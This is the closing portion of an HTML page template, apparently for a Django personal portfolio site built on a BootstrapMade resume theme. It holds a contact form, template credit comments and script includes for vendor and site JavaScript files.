      <form action="forms/contact.php" method="post" role="form" class="php-email-form mt-4">
        <div class="row">
          <div class="col-md-6 form-group">
            <input type="text" name="name" class="form-control" id="name" placeholder="Your Name" required>
          </div>
          <div class="col-md-6 form-group mt-3 mt-md-0">
            <input type="email" class="form-control" name="email" id="email" placeholder="Your Email" required>
          </div>
        </div>
        <div class="form-group mt-3">
          <input type="text" class="form-control" name="subject" id="subject" placeholder="Subject" required>
        </div>
        <div class="form-group mt-3">
          <textarea class="form-control" name="message" rows="5" placeholder="Message" required></textarea>
        </div>
        <div class="my-3">
          <div class="loading">Loading</div>
          <div class="error-message"></div>
          <div class="sent-message">Your message has been sent. Thank you!</div>
        </div>
        <div class="text-center"><button type="submit">Send Message</button></div>
      </form>

    </div>
  </section><!-- End Contact Section -->

  <div class="credits">
    <!-- All the links in the footer should remain intact. -->
    <!-- You can delete the links only if you purchased the pro version. -->
    <!-- Licensing information: https://bootstrapmade.com/license/ -->
    <!-- Purchase the pro version with working PHP/AJAX contact form: https://bootstrapmade.com/personal-free-resume-bootstrap-template/ -->
    <!-- Designed by <a href="https://bootstrapmade.com/">BootstrapMade</a> -->
  </div>

  <!-- Vendor JS Files -->
  <script src="{% static 'jake_portfolio/assets/vendor/purecounter/purecounter_vanilla.js' %}"></script>
  <script src="{% static 'jake_portfolio/assets/vendor/bootstrap/js/bootstrap.bundle.min.js' %}"></script>
  <script src="{% static 'jake_portfolio/assets/vendor/glightbox/js/glightbox.min.js' %}"></script>
  <script src="{% static 'jake_portfolio/assets/vendor/isotope-layout/isotope.pkgd.min.js' %}"></script>
  <script src="{% static 'jake_portfolio/assets/vendor/swiper/swiper-bundle.min.js' %}"></script>
  <script src="{% static 'jake_portfolio/assets/vendor/waypoints/noframework.waypoints.js' %}"></script>
  <script src="{% static 'jake_portfolio/assets/vendor/php-email-form/validate.js' %}"></script>
  <script src="{% static 'jake_portfolio/assets/vendor/php-email-form/validate.js' %}"></script>

  <!-- Template Main JS File -->
  <script src="{% static 'jake_portfolio/assets/js/main.js' %}"></script>
  <script src="{% static 'jake_portfolio/assets/js/py_scripts.js' %}"></script>
  <script src="{% static 'jake_portfolio/assets/js/iframe.js' %}"></script>



</body>

</html>
